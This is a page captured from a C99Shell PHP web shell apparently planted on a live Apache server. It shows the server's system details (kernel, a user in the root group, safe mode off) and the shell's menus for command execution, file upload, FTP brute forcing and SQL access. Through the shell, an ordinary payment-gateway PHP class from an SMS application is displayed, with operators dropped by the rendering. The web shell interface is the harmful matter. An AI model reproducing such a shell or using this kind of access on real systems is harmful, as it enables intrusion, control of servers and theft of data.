!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/Modules/PaymentGateway/SenderIdPurchaseGateway/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ProcessPayment.php (2.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Modules\PaymentGateway\SenderIdPurchaseGateway;

class 
ProcessPayment
{


    private 
$gateway;
    public 
$sender_id;
    public 
$numberReq;
    public 
$request;
    public 
$redirect_url;
    public 
$error_message;
    public 
$return_view;
    public 
$will_redirectfalse;

    public function 
__construct()
    {

    }

    public function 
set_gateway($gateway)
    {
        
$this->gateway $gateway;
        return 
$this;
    }

    public function 
senderId($number)
    {
        
$this->sender_id $number;
        return 
$this;
    }

    public function 
request($request)
    {
        
$this->request $request;
        return 
$this;
    }

    public function 
process()
    {
        if (
$this->gateway == 'paypal') {
            
$gateway = new PayPalPayment();
            
$gateway->senderId($this->sender_id);
        } else if (
$this->gateway == 'card') {
            
$gateway = new StripePayment();
            
$gateway->senderId($this->sender_id);
            
$gateway->request($this->request);
        }else if (
$this->gateway == 'paytm') {
            
$gateway = new PaytmPayment();
            
$gateway->senderId($this->sender_id);;
        }else if (
$this->gateway == 'paystack') {
            
$gateway = new PaystackPayment();
            
$gateway->senderId($this->sender_id);
        }else if (
$this->gateway == 'mollie') {
            
$gateway = new MolliePayment();
            
$gateway->senderId($this->sender_id);
        }else if (
$this->gateway == 'stripe_checkout') {
            
$gateway = new StripeCheckoutPayment();
            
$gateway->senderId($this->sender_id);
        }else if (
$this->gateway == 'iyzico') {
            
$gateway = new IyzicoPayment();
            
$gateway->senderId($this->sender_id);
            
$gateway->request($this->request);
        }else if (
$this->gateway == 'authorize_net') {
            
$gateway = new AuthorizeNetPayment();
            
$gateway->senderId($this->sender_id);
        }else if (
$this->gateway == 'sslcommerz') {
            
$gateway = new SSLCommerz();
            
$gateway->senderId($this->sender_id);
            
$gateway->request($this->request);
        }else if (
$this->gateway == 'uddoktapay') {
            
$gateway = new Uddoktapay();
            
$gateway->senderId($this->sender_id);
            
$gateway->request($this->request);
        }

        
$payment = new Payment($gateway);
        
$payment->trigger();

        
$this->redirect_url =$payment->gateway->redirect_url();
        
$this->will_redirect =$payment->gateway->will_redirect();
        
$this->error_message =$payment->gateway->error_message();
        
$this->return_view =$payment->gateway->return_view();

        return 
$this;

    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0091 ]--